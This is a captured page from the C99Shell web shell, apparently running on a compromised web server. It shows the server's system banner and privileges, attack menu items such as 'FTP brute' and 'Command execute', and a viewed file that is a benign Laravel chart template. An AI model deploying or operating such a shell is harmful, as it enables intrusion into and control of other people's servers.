!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-163-generic #173-Ubuntu SMP Tue Oct 14 17:51:00 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html_ecom1/resources/views/admin/dashboxes/   drwxr-xr-x
Free 25.75 GB of 117.98 GB (21.83%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     donut-chart.blade.php (1.41 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<div class="card">
    <div class="card-header">
        <h5 class="font-weight-600 c-gray-5">{{ __('ORDER STATUS THIS MONTH') }}</h5>
    </div>
    <div class="card-block h-360">
        @if (max($orderStatus['count']))
            <canvas id="chart-donut-1" class="w-100 h-300px"></canvas>
        @else
            <h6 class="text-secondary">{{ __('No data found.') }}</h6>
        @endif
    </div>
</div>
<script type="text/javascript">
    $(document).ready(function() {
        var bar = document.getElementById("chart-donut-1").getContext('2d');
        var data = {
            labels: @json($orderStatus['status'] ?? null),
            datasets: [{
                data: @json($orderStatus['count'] ?? 0),
                backgroundColor: [
                    "#fcca19",
                    "#FFA826",
                    "#E393FF",
                    "#00DFFF",
                    "#33C172"
                ],
                hoverBackgroundColor: [
                    "#fcca19",
                    "#FFA826",
                    "#E393FF",
                    "#00DFFF",
                    "#33C172"
                ]
            }]
        };
        var myPieChart = new Chart(bar, {
            type: 'doughnut',
            data: data,
            responsive: true,
            options: {
                maintainAspectRatio: false,
            }
        });
    });
</script>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0037 ]--